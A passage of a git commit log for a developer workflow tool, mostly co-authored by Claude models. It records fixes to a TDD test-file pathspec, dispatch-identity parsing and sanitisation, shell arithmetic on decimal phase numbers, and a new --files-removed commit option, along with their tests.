Emitted-Drift-Ack-Growth: ship.md — retiring the Gemini CLI runtime name; Antigravity is one byte longer
Emitted-Drift-Ack-Growth: smart-entry.md — retiring the Gemini CLI runtime name; Antigravity is one byte longer
Emitted-Drift-Ack-Growth: ui-phase.md — retiring the Gemini CLI runtime name; Antigravity is one byte longer
Emitted-Drift-Ack-Growth: ui-review.md — retiring the Gemini CLI runtime name; Antigravity is one byte longer
Emitted-Drift-Ack-Growth: undo.md — retiring the Gemini CLI runtime name; Antigravity is one byte longer
Emitted-Drift-Ack-Growth: update.md — retiring the Gemini CLI runtime name; Antigravity is one byte longer
Emitted-Drift-Ack-Growth: validate-phase.md — retiring the Gemini CLI runtime name; Antigravity is one byte longer
Emitted-Drift-Ack-Growth: verify-work.md — retiring the Gemini CLI runtime name; Antigravity is one byte longer
Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>

* chore(#4728): add the changeset fragment

The PR body claimed one was present and it was not — caught by
scripts/changeset/lint.cjs reporting fail_missing_fragment, not by the
checklist, which is exactly why the lint exists.

Type Fixed: the diff is prose, and a docs-only fix uses Fixed since there is
no Documentation type.

Refs #4728

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>

---------

Co-authored-by: sim <sim@local>
Co-authored-by: Claude Opus 5 <noreply@anthropic.com>
2026-09-14 16:49:52 -04:00
Tom Boucher
ed819aa4d6 fix(#4379): make the TDD RED-commit pathspec language-agnostic (#4715)
* fix(#4379): make the TDD RED pathspec language-agnostic

The pathspec IS this gate's definition of "a test file", and it listed
only JS/TS conventions. Go's *_test.go matches none of them, so a commit
adding a failing Go test was invisible, RED_COMMIT came back empty, and
every behaviour-adding task halted with TDD GATE TRIPPED. references/tdd.md
already advertises `go test ./...` and `cargo test` as supported, so the
gate was refusing to see tests the docs promised to support.

Two corrections, both measured against a seeded repo rather than reasoned:

- cover the conventions tdd.md advertises: *_test.go, test_*.py,
  *_test.py, *_test.exs, *_spec.rb, *_test.rb.
- drop the `**/` prefix. It does NOT match a path with no directory
  component, so a root-level foo.test.js was invisible even in the
  language the gate did support -- a second defect the report did not
  mention. A bare glob matches at every depth.

Deliberately not widened to ordinary source: a pathspec matching
implementation files would make the gate pass on any in-scope commit,
which is worse than tripping wrongly. Rust is a known gap for that exact
reason and is now documented rather than silently broken.

Driving the shipped pathspec against a seeded repo: before, 0 of 7
language/root conventions matched; after, 7 of 7, with src/impl.go and
src/lib.rs correctly unmatched in both.

Emitted-Drift-Ack-Growth: execute-phase.md — the widened pathspec plus the comment recording why it must not cover ordinary source
Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>

* test(#4379): drive the shipped RED pathspec against a real repo

The existing row pinned the pathspec as a literal string, which the fix
makes stale. Re-point it, and add behavioural coverage that EXTRACTS the
pathspec from the shipped workflow and runs git log with it against a
seeded repo -- re-typing the pattern into the test would only assert that
two copies of a string agree.

Rows: every advertised convention is visible; a root-level test file is
not invisible (the half the report missed); existing JS/TS still matches;
implementation files never match, so the gate can still trip; and Rust
inline #[test] stays out of reach, asserted rather than left silent.

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>

* chore(#4379): add changeset fragment

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>

* fix(#4379): be honest about the widened pathspec's cost

Adversarial review: the rationale comment claimed the change was safe
without naming what it gives up. `*.spec.*` can match a non-test file
carrying the word (api.spec.json, openapi.spec.yaml), which lets the gate
pass on a commit touching only that. Not new -- `**/*.spec.*` already
matched those at any nested path, so dropping `**/` extends the same
class to the root -- but the comment should say so rather than imply
the widening is free.

Also: the tdd.md list named Ruby and Elixir as recognised while the
detection step above it enumerates only Node/Python/Go/Rust. Say
explicitly that the gate's pathspec is wider than the detected project
types, and why that is deliberate.

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>

* test(#4379): drop a vacuous row, fold its point into a real one

Adversarial review: the "rust inline #[test] remains out of reach" row
asserted src/lib.rs never matches -- the identical assertion to the
"implementation files never match" row directly below it. It exercised
nothing about #[test] semantics and would have passed against almost any
fix, so it was coverage theatre.

Delete it and move its rationale into the row that already carries the
assertion, where it explains WHY the Rust gap follows from that row
holding: the two cannot both be satisfied by a path-based gate.

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>

* fix(#4379): move the pathspec rationale out of a size-capped file

execute-phase.md sits under a FROZEN byte ceiling (ADR-857 Phase 6,
#1168: < 93600). The 20-line rationale comment I added pushed it to
93933 and tripped seven tests, all the same ceiling. Base was 92371, so
the budget was 1229 bytes and the comment spent 1481.

Keep six lines at the call site -- what the pathspec is, why it is not
wider, where to read more -- and move the trade-off detail to
references/tdd.md, which has no ceiling. That is the right home anyway:
the workflow is loaded into context on every run, the reference is read
on demand.

92882 bytes, 718 under. Pathspec line byte-identical; re-proved
behaviour after the trim: 0/7 conventions before, 7/7 after, no
implementation files matched either way.

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>

* chore(#4379): refresh the compact-content benchmark baseline

execute-phase.md changed size, so the committed baseline drifted. The
script's own contract makes it a report that exits 0, but the test
asserts the committed baseline is up to date -- refresh via --write,
which is what the drift message instructs.

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>

* chore(#4379): backfill the changeset PR number

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>

---------

Co-authored-by: sim <sim@local>
Co-authored-by: Claude Opus 5 <noreply@anthropic.com>
2026-09-14 00:57:08 -04:00
Tom Boucher
c0b2a05d2f fix(#4594): one canonical dispatch-identity owner — the emitted format and the parser that reads it back (#4693)
* fix(#4594): give dispatch identity one owner for the emitted format and its parser

The isolation guards decided whether a run-scoped sentinel applied to a
dispatch by regex-scraping model-authored prose. The scrape returned values in
a different namespace from the ones the sentinel records, so the comparison
could never succeed:

  sentinel  { phase: "03", plan: "03-02-hardening" }   <- $PHASE_NUMBER / $plan_id
  prose     "Execute plan 02 of phase 03-auth."
  scraped   { phase: "03-auth.", plan: "02" }          <- greedy (\S+), both wrong

#4594 reports only the phase half. Measured against a real phase-plan-index
run, plans[].id is phase-prefixed, plan-numbered AND slugged, while the prose
carries a bare in-phase plan number — so the plan field mismatches too, and the
Claude path is dead rather than latent. A fresh sentinel was therefore
discarded on every executor dispatch and every legitimate ISOLATION=none
degrade was denied, leaving the work unrun.

hooks/lib/dispatch-identity.js is now the single owner of both halves. The two
prompt-body producers emit a canonical marker carrying the same shell values
the sentinel records, so producer and consumer agree by construction. The prose
frame stays as a fallback, bounded by the phase-token grammar ADR-2121 owns and
deliberately reporting no plan — an absent identifier means "cannot compare"
and is safe; a wrong one is a false mismatch and is not.

The prose sentence itself is byte-identical: the executor agent reads it too,
so the marker is purely additive (Hyrum's Law).

An inapplicable sentinel is now named in the guards' deny reason instead of
being dropped silently — the silence is why this survived three producers and
two consumers unnoticed. Interpolated values come from a sentinel file and from
prompt text, so both are length-bounded and stripped of control characters.

ADR-4630 locks the seam and maps the epic's three phases.

Refs #4630
Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>

* fix(#4594): resolve eight review findings across the dispatch-identity seam

Three orthogonal review engines ran on 43418af144 — the code-review skill's
Standards and Spec axes, and an isolated adversarial security pass — plus a
self-review of the committed diff. Every finding is fixed here; none deferred.

F1 (major, reproduced). A keyless or unknown-key-only marker — the literal
"[gsd:dispatch]" or "[gsd:dispatch run=..]" — matched the marker grammar and
returned source:'marker' with both fields null, suppressing the prose fallback
entirely. Any prompt text containing that literal silently disabled identity
narrowing, so a fresh sentinel applied to a dispatch it was never scoped to,
defeating #3045 SECURITY F2. Prompt text is attacker-influenceable. A marker
that yields neither recognized key is no longer a marker: the scan continues to
later markers, then later texts, then prose. Forward-compatible tolerance of
unknown keys is unchanged.

F2/F3 (major). The first cut duplicated sanitizeForReason,
describeSentinelDiscard and REASON_INTERPOLATION_MAX_LEN byte-for-byte across
both guards — the exact defect class this epic exists to delete, and with no
cold-load justification, since both hooks already require hooks/lib/. They now
live in hooks/lib/isolation-deny-reason.js, and buildSentinelDiscard lives in
isolation-sentinel.js beside the comparison it mirrors, returning the nested
{sentinel:{phase,plan}, dispatch:{phase,plan}} shape instead of a bespoke
four-field bag that renamed the pairs already flowing through the seam.

F4 (hard violation). The visibility test asserted on the deny reason's prose.
CONTRIBUTING.md prohibits raw text matching on hook output, which is why every
deny carries a stable reason_code. The discard is now a structured
sentinel_discarded field on each hook's stdout JSON, and the test asserts that;
the sentence stays for the operator but is no longer the contract.

F5 (hard violation). The 64-character truncation limit had no boundary
coverage. 63/64/65 are now exercised against the single consolidated helper.

F6 (minor). sanitizeForReason stripped C0/C1 controls but not U+2028/U+2029 or
the bidi overrides, so a crafted value could still reflow or reverse the
message. Both classes are stripped, with a test each.

F7 (major). The producer/template parity test was vacuous — it rendered a
marker and re-parsed its own output, and would have passed with both templates
deleted. It now reads the two workflow templates, extracts each marker line,
substitutes the measured values and asserts the owner's parser returns them.
Proven red by deleting one template's marker line before being proven green.

F8 (doc). ADR-4630 and the design notes claimed the marker is guaranteed on the
orchestrator-worktree path because that prompt is built in shell. It is not:
executor-isolation-dispatch.md:131 says plainly that those are template
placeholders, not shell variables, so {plan_id} is model-substituted there too.
A false guarantee in a design lock is worse than a stated limit. Both documents
now say the marker is model-substituted on both paths and that the prose
fallback is the real floor everywhere. The "3 workflow templates" count was
also wrong — 3 prose sites across 2 files, 2 of which carry the marker.

Refs #4630
Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>

* chore(#4594): refresh the compact-content baseline and acknowledge execute-phase.md growth

Refs #4630.

The dispatch-identity marker and its substitution note grew
gsd-core/workflows/execute-phase.md by 525 bytes (91846 -> 92371), which drifts
two real-tree guards that lint:ci does not run:

- tests/benchmark-compact-content.test.cjs asserts the committed baseline is
  "up to date"; the split for execute-phase.md moved off 25827 -> 25952 and on
  23576 -> 23701, taking its compaction reduction 8.72% -> 8.67%. Baseline
  regenerated with scripts/benchmark-compact-content.cjs --write.
- tests/emitted-attribution.test.cjs requires a growth acknowledgment trailer
  for any emitted file that grows, keyed on the bare filename. Added below.

The growth is two additions and no rewrites: the [gsd:dispatch ...] marker line
inside the Agent() prompt's <objective>, and the note telling the orchestrator
to substitute {plan_id} with the plan's id verbatim. Both are load-bearing --
the marker is what lets a guard hook match a dispatch to the sentinel the
per-plan gate wrote, and without the note the orchestrator has no instruction
telling it the value must not be paraphrased.

Emitted-Drift-Ack-Growth: execute-phase.md — adds the canonical [gsd:dispatch] identity marker and its {plan_id} substitution note, which the isolation guards compare verbatim against the run-scoped sentinel (#4594)
Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>

* chore(#4594): set changeset fragment pr to 4693

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>

---------

Co-authored-by: sim <sim@local>
Co-authored-by: Claude Opus 5 <noreply@anthropic.com>
2026-09-13 15:36:08 -04:00
Tom Boucher
db4d8a9bae fix(#4619): execute-phase computes decimal/N-segment phase numbers without breaking shell arithmetic (#4644)
* fix(#4619): execute-phase computes decimal/N-segment phase numbers without breaking shell arithmetic

$((10#${PHASE_NUMBER})) is a hard bash/zsh syntax error when PHASE_NUMBER is
decimal (01.1, from an inserted phase) or N-segment (23.1.2) — neither is
valid shell-arithmetic syntax at all, and the failed expansion aborts the
rest of the snippet in a non-interactive shell. safe_resume_gate runs
unconditionally before trusting STATE.md or dispatching any executor, so
execute-phase failed at its own gate before the first executor on any
decimal phase, regardless of workflow.tdd_mode. Regression from #4194.

Fixes all 4 sites: safe_resume_gate and the TDD gate in
workflows/execute-phase.md, the completion-signal spot-check fallback in
workflows/execute-phase/steps/completion-reconciliation.md, and the
executor gate validation example in references/tdd.md. Each now zero-strips
only the leading integer segment into a *_INT variable (via %%.* / #
parameter expansion — always valid shell syntax regardless of what follows)
and keeps the remainder as an escaped-dot string for the anchored commit-
scope regex, exactly as issue #4619 verified in both bash and zsh. A plain
integer phase (12, 01) computes byte-identically to before.

Co-Authored-By: Claude Sonnet 5 <noreply@anthropic.com>

* test(#4619): pin the decimal/N-segment fix and characterize the pre-fix bug

Behavioral coverage via real bash execution: the old $((10#01.1)) form
throws (characterizes the bug, matching the issue's own reproduction); the
new form resolves 01.1 -> 1\.1 and 23.1.2 -> 23\.1\.2, unchanged for plain
integers (12 -> 12, 01 -> 1); the resulting anchored ERE matches
feat(01.1-03):/test(1.1-3): and correctly rejects feat(01-03):,
feat(01.2-03):, feat(011-03):, feat(12-03): for a decimal phase — mirroring
issue #4619's own verified table exactly. Updates
safe-resume-gate-anchoring.test.cjs's 4 existing source-text assertions
(one per site) to the new fixed text.

Co-Authored-By: Claude Sonnet 5 <noreply@anthropic.com>

* chore(#4634): refine the shell-arith drift detector to distinguish safe from unsafe arithmetic

With #4619's fix in place, the guard's original "ban $((10#... outright,
match any occurrence" was too blunt: it flagged a comment merely mentioning
the pattern in prose, the now-safe $((10#$PHASE_INT)) arithmetic on an
already-%%.*-stripped integer, and the always-safe plan-id arithmetic
(plan ids are plain integers, never decimal). Refines the detector to skip
full-line comments and to only flag a captured variable/placeholder name
that contains "phase" and does NOT end in _INT/_int — the naming convention
the #4619 fix establishes at all four sites for "already reduced to a safe
integer." A plan-id variable was never phase-number arithmetic in the first
place and is excluded on the same basis.

This closes epic #4634's D6 ("lint-phase-id-drift... passes with no new
exemptions") and D7 ("a decimal and N-segment phase id survive an
end-to-end execute-phase selection without error") for real — the guard now
reports zero violations across all five .cts/.md rules.

Co-Authored-By: Claude Sonnet 5 <noreply@anthropic.com>

* chore: regenerate conformance-tier manifests for the new test file

Co-Authored-By: Claude Sonnet 5 <noreply@anthropic.com>

* test(#4619): cover the plain-padded-integer near-miss matrix too

Review found the anchored-ERE near-miss coverage only exercised the
decimal case (PHASE_NUMBER=01.1); issue #4619's own worked table also
verifies the plain padded-integer case (01 -> PHASE_N=1) against its own
near-miss set (matches 01-03, rejects 01.1-03/011-03/12-03). Adds the
missing assertion.

Co-Authored-By: Claude Sonnet 5 <noreply@anthropic.com>

* docs(#4619): add Fixed changeset

Co-Authored-By: Claude Sonnet 5 <noreply@anthropic.com>

* fix(#4619): correct JS backslash-escaping in safe-resume-gate anchoring test

The test's string-literal assertions for the PHASE_FRAC//./\\.} pattern wrote
only 2 backslash characters in JS source, which single-quoted-string parsing
collapses to 1 real backslash at runtime -- but the workflow/reference files
actually contain 2 raw backslash bytes at that position (needed so bash's
${var//pattern/replacement} produces the correct single-backslash output).
Write 4 backslash characters in the JS source at all 4 occurrences so the
runtime string matches the files' real bytes.

Co-Authored-By: Claude Sonnet 5 <noreply@anthropic.com>

* chore(#4619): refresh the committed compact-content benchmark baseline

The new PHASE_INT/PHASE_FRAC arithmetic lines added to
gsd-core/workflows/execute-phase.md shifted its committed compaction-ratio
baseline. Regenerate via `node scripts/benchmark-compact-content.cjs --write`.

Co-Authored-By: Claude Sonnet 5 <noreply@anthropic.com>

* docs(#4619): note the safe_resume_gate arithmetic growth in the test header

The emitted-attribution gate flags execute-phase.md growing 91253 -> 91846
bytes (593 bytes). The growth is the fix: the safe_resume_gate and TDD RED
block now derive PHASE_INT/PHASE_FRAC before computing PHASE_N, so a
decimal/N-segment phase number (e.g. 01.1, 2.3.1) zero-strips its leading
integer segment via base-10 arithmetic instead of forcing the whole value
through $((10#...)) and hitting a hard shell syntax error on the first dot.

A blank line previously separated the Emitted-Drift-Ack-Growth trailer from
the Co-Authored-By trailer below it, which splits git's trailer-block
detection: only the last contiguous non-blank run of Key: Value lines at the
end of a commit message is recognized as trailers, so the growth ack was
silently read as ordinary body text and the differential-attribution gate
failed with the growth unacknowledged. Joining the two trailers into one
contiguous block fixes it.

Emitted-Drift-Ack-Growth: execute-phase.md — adds PHASE_INT/PHASE_FRAC derivation to the safe_resume_gate and TDD RED commit-scope grep so a decimal/N-segment phase number zero-strips its leading integer segment via base-10 arithmetic instead of failing on a non-numeric value (#4619)
Co-Authored-By: Claude Sonnet 5 <noreply@anthropic.com>

* test(#4208): replace chmod-based restore-failure injection with a root-proof git shim

`tests/commit-files-deletion.test.cjs`'s two restore-failure tests simulated
an unwritable index via a `post-index-change` hook running `chmod a-w` on
the git dir. That relies on the OS enforcing the *owner's own* permission
bits against itself, which uid 0 (a routine identity inside this repo's
Docker-based gsd-test benches) does not: every DAC check short-circuits true
for root, so the write the chmod meant to block silently succeeds, the
restore comes back clean, and the disclosure/rollback behavior under test
never actually gets exercised.

This is CLAUDE.md's own named anti-pattern for I/O-failure injection
("Cross-platform test IO-failure injection" — chmod tricks fail under root
Docker/CI). It is confirmed as the actual root cause here, not a production
defect: `src/commands.cts`'s `restoreRemovedEntries`/rollback-disclosure
logic (added by #4253, merged just before this run) was hand-traced and
manually reproduced end to end on an unprivileged workstation against a
freshly built `gsd-core/bin/lib/commands.cjs`, and it already produces
exactly the `staging_failed` + "could not be restored" / "could NOT be
restored during rollback" results both tests assert. The other
`post-index-change`-based tests in this file (a `sleep` to force a timeout;
a real `update-index` to flip a restored entry's mode) are unaffected
because neither depends on a permission check — consistent with only the
two chmod-based tests failing on the real remote run.

Replaces the chmod fixture with a fake `git` placed ahead of the real one on
PATH that fails only `update-index --add --cacheinfo` — the one call the
restore makes — unconditionally, regardless of privilege level. Every other
git invocation execs straight through to the real binary, so the rest of
each scenario (`rm --cached`, the restore's own `ls-files` verification,
etc.) is exercised exactly as before.

Co-Authored-By: Claude Sonnet 5 <noreply@anthropic.com>

* chore(#4619): backfill changeset pr number to 4644

Co-Authored-By: Claude Sonnet 5 <noreply@anthropic.com>

* fix(#4619): feed the bash fixture script via stdin, not argv, to fix Windows CI

Passing the script as a `-c "<script>"` argv element made it subject to
Windows' CreateProcess command-line argument encoding, which silently
dropped the escaped-dot backslashes before bash ever saw them (observed on
PR #4644's windows-latest CI shard: `1\.1` came back as `1.1`). Feeding the
same script via stdin instead removes argv entirely from the transport, so
there is nothing for Windows to re-encode. POSIX behavior is unchanged.

Co-Authored-By: Claude Sonnet 5 <noreply@anthropic.com>

---------

Co-authored-by: sim <sim@local>
Co-authored-by: Claude Sonnet 5 <noreply@anthropic.com>
2026-09-11 15:47:14 -04:00
0xdhx
4cc2a466b5 fix(#4208): add --files-removed so commit --files can record a move without a directory pathspec (#4253)
* fix(#4208): add --files-removed so commit --files can record a move without a directory pathspec

`cmdCommit`'s `--files` list can stage an addition but never a deletion:
the #2014 guard skips a missing explicit entry because the filesystem
cannot tell "moved away" from "not written yet". A caller that moves a
file therefore had two forms, both wrong — a directory entry records the
move but also commits every unrelated file in that directory (a
concurrent session's in-flight todo, in the unattended execute-phase
sweep), and a file entry leaves the old path's deletion dangling with the
todo tracked at both paths.

`--files-removed <paths>` is the caller-declared delete intent. Each entry
names a file, or a directory whose tracked-but-absent files are the
removals; those paths are staged with `git rm --cached` and join the
commit pathspec. `--files` keeps its skip-if-missing contract untouched.
A file entry still present on disk fails the commit closed with the
existing staging-failure rollback; a never-tracked path is a no-op.
`--files-removed` alone is a declared scope, not the unscoped .planning/
sweep.

The dispatcher previously folded every non-flag token after `--files`
into that list, so a second list flag could not exist; each list now
runs from its flag to the next `--` token.

The execute-phase todo sweep names the moved todos on both sides from
CLOSED[@], and cleanup's archive commit moves .planning/phases/ and
.planning/quick/ under --files-removed.

Fixes #4208

Emitted-Drift-Ack-Growth: cleanup.md — the archive commit moves phases/ and quick/ under --files-removed; the growth is one paragraph stating why those two directories must not be --files entries

* chore(#4208): set changeset fragment pr to 4253

* fix(#4208): fit execute-phase.md under the ADR-857 ceiling and re-point the #2415 guard

Three CI failures, all consequences of this PR's own change.

1. gsd-core/workflows/execute-phase.md was 93,577 bytes against the
   ADR-857 Phase 6 margin gate's <= 93,400 (hard ceiling 93,600). The
   three-line rationale comment plus the four-line array-building block
   added 318 bytes to a file that had only 141 of headroom on next.

   Move the rationale to docs/CLI-TOOLS.md -- which this PR already
   extends with the --files-removed contract, and which is where the
   ADR-857 gate wants call-site detail to live rather than in the host
   workflow -- and fold the array build onto one line. 93,577 -> 93,372.

2/3. tests/close-phase-todos-stage-deletion.test.cjs pinned the #2415
   guarantee to its old MECHANISM: it regex-matched the literal
   .planning/todos/{completed,pending}/ directory pathspecs in the
   commit --files list. This PR deliberately replaced those with named
   files (a directory entry also committed an unrelated todo a
   concurrent session dropped in mid-close), so the guard failed on a
   change it should have accepted.

   Re-point it at the new mechanism without weakening it: assert the
   ADDED array reaches --files, the REMOVED array reaches
   --files-removed, STATE.md is still committed, and -- newly -- that
   the two arrays are built from $COMPLETED_DIR and $PENDING_DIR
   respectively. Verified by negative control: deleting
   --files-removed "${REMOVED[@]}" from the workflow still fails the
   test, so the #2415 regression remains caught.

Note for the merge queue: #4233 also grows execute-phase.md (+114). The
two are additive -- different regions, no textual conflict -- so with
both landed the file reaches ~93,486, over the 93,400 margin though
under the 93,600 hard ceiling. Whichever merges second will need to
reclaim ~86 bytes.

Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_0183892Y3fxxirte4WNmBKbv

* fix(#4208): reclaim execute-phase.md bytes so the PR is net-neutral under the ADR-857 margin

Rebasing onto next surfaced the byte-gate collision flagged earlier on
this PR: #4284 grew execute-phase.md by 95 bytes (93,259 -> 93,354),
so this PR's +113 landed at 93,467 against the <= 93,400 margin in
tests/claude-orchestration.test.cjs.

Compact the close_phase_todos step this PR already edits -- drop the
PHASE_NUM indirection, fold the normaliser and the match guard, print
the closed list with one printf, shorten the step's prose -- without
touching the mechanism the #2415 guard pins (ADDED/REMOVED arrays, the
plain mv). 93,467 -> 93,349: 5 bytes under the base, so the PR no
longer spends any of next's 46 bytes of headroom.

Co-Authored-By: Claude Fable 5.1 <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_01MkU9ueBNHQzCpc3du5rKXm

* fix(#4208): classify absent index entries before staging a removal; restore removed entries exactly on rollback

Review of #4253 found three Majors with one root cause: the removal
side judged presence by fs.lstatSync alone, where the addition side
already reads `git ls-files -v` state. Absence from the worktree is not
removal:

- a submodule gitlink (mode 160000) whose directory was deleted by hand
  lists like a file and was `rm --cached` with no .gitmodules cleanup;
- a skip-worktree path is never materialised by a cone-mode sparse
  checkout, so a directory entry over a sparse-excluded tree dropped
  that whole tree from the index;
- an assume-unchanged path's worktree state is not something git
  itself consults;
- an intent-to-add entry (`git add -N`) renders as a plain cached entry
  on the empty blob, yet nothing tracked exists to remove and no
  rollback can restore the flag.

The index listing now carries each entry's `ls-files -v -s` tag, mode
and stage. Only a plain cached (H), stage-0, non-gitlink entry is a
removal candidate; every other state is left alone under a directory
entry (exactly like a present file) and fails closed when named
directly, with the state in the error. "Named directly" is decided on
RESOLVED paths, not strings -- realpath of the longest existing prefix
with the absent tail re-appended: an absolute path, `./x`, `--cwd`, or a
symlinked spelling of the tree (macOS `/var` ->
`/private/var`, where `process.cwd()` is the real path and the caller's
absolute path is not -- CI on this round's first push) all resolve to the
same entry, where a string compare against git's cwd-relative output
silently took the directory polarity (pre-push review, driven; the
symlink case is driven with an aliased fixture directory). The enumeration's domain is what
`ls-files -v -s` can emit for an index entry, stated at the classifier.

The third Major -- on an unborn HEAD a successful `rm --cached` was
never rolled back when a later entry failed -- is fixed differently
from the review's suggestion. Pushing the path into stagedPaths would
put it on the commit pathspec, which a root commit refuses ("pathspec
did not match", driven), and `git reset -- <path>` cannot restore an
entry with no HEAD anyway. Instead every index entry this call removes
is recorded (mode, blob) before the `rm` and put back with
`update-index --cacheinfo` on rollback. That also restores a
caller-pre-staged blob at a removed path exactly, where a reset would
have silently replaced it with HEAD's version. The rollback is
best-effort, as the addition-side reset already was, and the docs say
so.

Eight tests: gitlink under a directory entry, named directly, and named
by absolute path; skip-worktree both forms; intent-to-add both forms;
assume-unchanged named; unborn-HEAD partial failure restores the
removal; pre-staged blob survives the rollback.

Co-Authored-By: Claude Fable 5.1 <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_01MkU9ueBNHQzCpc3du5rKXm

* fix(#4208): drop the empty fenced block left dangling in cleanup.md's commit step

Review nit on #4253: inserting the --files-removed rationale between the
original bash block and its closing fence left an empty ```bash``` pair
before </step>. Harmless at runtime, a formatting artifact of this PR's
own diff; removed.

Co-Authored-By: Claude Fable 5.1 <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_01MkU9ueBNHQzCpc3du5rKXm

* fix(#4208): a boolean flag inside a commit path list no longer ends the list

Review minor on #4253: collectList stopped at the next `--` token, so a
positional wedged between a boolean flag and the next list flag
(`--files a --amend b --files-removed c`) was claimed by neither list
and silently dropped -- a regression in shape against the old
slice-to-end parse, which filtered `--` tokens and kept `b`. No current
call site interleaves that way, but the gap was real.

A list now runs to the next LIST flag (`--files` / `--files-removed`)
and skips boolean flags on the way, and a REPEATED list flag merges
its runs (`--files a --files b` -> [a, b]) as the slice-to-end parse
did -- a first cut stopped at the repeat and dropped `b`, the same
silent-drop shape one level over (pre-post comment audit). The only
change #4208 makes to parsing is that a second list flag can exist.
Tests: STATE.md wedged between --no-verify and --files-removed lands
in the commit; both runs of a repeated --files reach it.

Co-Authored-By: Claude Fable 5.1 <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_01MkU9ueBNHQzCpc3du5rKXm

* test(#4208): drive the reappearance window with a post-index-change hook

Review nit on #4253: the defensive re-check for a file recreated between
the absence test and `git rm --cached` -- the concurrent-session race
this PR's own changeset names -- had no test. git fires
post-index-change the moment `rm --cached` writes the index, so a hook
that copies the file back exactly then exercises the window
deterministically. The call reports staging_failed / "reappeared on
disk", commits nothing, and the rollback restores the removed entry.

Co-Authored-By: Claude Fable 5.1 <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_01MkU9ueBNHQzCpc3du5rKXm

* fix(#4208): restore a staged removal when the call records nothing

A `git rm --cached` that succeeds mutates the index whether or not a commit
follows. Only the staging-failure rollback put those entries back, so a call
that reached `nothing_to_commit` reported no state change while the removal sat
staged -- riding along on the caller's next commit.

The review named the unborn-HEAD, removal-only shape. Keying on `headExists`
would have fixed half of it: the guard also fires with a real HEAD when the
removed path is index-only (added, never committed), because `diff HEAD` reads
clean with the path absent on both sides. Both shapes now restore, at both
`nothing_to_commit` exits. The failure exits are deliberately left alone --
they report a failure rather than no-change, and the addition side leaves its
own staged paths there too.

Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_016gyGdweAdAG6nFv9Jx32vj

* refactor(#4208): lift declared-removal staging out of the cmdCommit hotspot

`cmdCommit` was a critical-risk hotspot before this flag existed, and #4208 had
inlined another ~270 lines into it. `stageDeclaredRemovals(cwd, removedDeclared)`
now owns the index-state classification, path canonicalisation and entry
recording, returning the pathspec entries and the recorded removals its caller
merges.

Pure motion: no branch, message or probe changed. Only the two accumulators
became local names, and `restoreRemovedEntries` stays with the caller because
the exits that restore are the caller's. cmdCommit 888 -> 625 lines here; the
extracted helper is 277.

(Figures corrected after publication: an earlier version of this message said
854 -> 591 and claimed the result was below cmdCommit's pre-#4208 shape. Both
were wrong -- the count came from a faulty brace scanner, and `next`'s cmdCommit
is 581, so this is above it, not below.)

Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_016gyGdweAdAG6nFv9Jx32vj

* test(#4208): property-test the two-list commit parser

RULESET.TESTS.property-based-testing asks a parser for at least one property
test asserting a domain invariant; `collectList` had only hand-picked examples,
one per shape a review round had already broken.

Hoisted it to module scope as `collectListFlagValues` and exported it in the
file's existing exported-for-tests convention -- a parser reachable only by
spawning the CLI can be tested one example at a time and no faster.

Three properties over generated argv: every positional lands in exactly the run
open at it whatever the flag order or count; no positional after the first list
flag is dropped or double-claimed; and with `--files-removed` absent the parse
equals the pre-#4208 slice-to-end parse. Controlled against two mutants -- a run
ending at any `--` token, and a repeated list flag that does not merge -- each
of which the properties catch.

Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_016gyGdweAdAG6nFv9Jx32vj

* test(#4208): pin cleanup.md's archive commit to --files-removed

execute-phase.md's rewrite is pinned by the #2415 guard in this file;
cleanup.md's equivalent was not, so reverting its routing would have been
caught by nothing -- the mechanism's unit tests never read this file and pass
either way.

Asserts the two archived directories are under --files-removed and NOT under
--files (where a directory entry sweeps in a concurrent session's in-flight
writes), and that the destinations and STATE.md stay on the additive half.
Controlled by restoring the pre-#4208 sweep, which fails it.

Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_016gyGdweAdAG6nFv9Jx32vj

* test(#4208): pin that a symlink to a directory is one tracked path

Review of #4253 read the `lstatSync(...).isDirectory()` test as a
symlink-following defect. Driving it says the opposite: git tracks the link as
a single blob (mode 120000) and does not traverse it, so the tracked paths
"under" it live at the real directory and were never named by the caller.
Following the link would stage those -- the directory sweep #4208 exists to
remove -- while the named entry still sat present on disk.

Pinned rather than changed, with the premise driven in the test body. Swapping
`lstatSync` for `statSync` -- the prescription as written -- fails it.

Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_016gyGdweAdAG6nFv9Jx32vj

* chore(#4208): refresh the compact-content baseline for this PR's execute-phase edit

The base range added `tests/benchmark-compact-content.test.cjs` and a committed
token baseline over the compacted workflows. This PR edits
`gsd-core/workflows/execute-phase.md`, so the baseline drifts by +12 tokens on
that entry and on the aggregate.

Refreshed with `node scripts/benchmark-compact-content.cjs --write`; the diff is
those two entries and nothing else.

Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_016gyGdweAdAG6nFv9Jx32vj

* fix(#4208): report a removal the call could not put back

Round review of this round found the restore itself unchecked: the helper
ignored `update-index`'s exit code, so a FAILED restore still reported
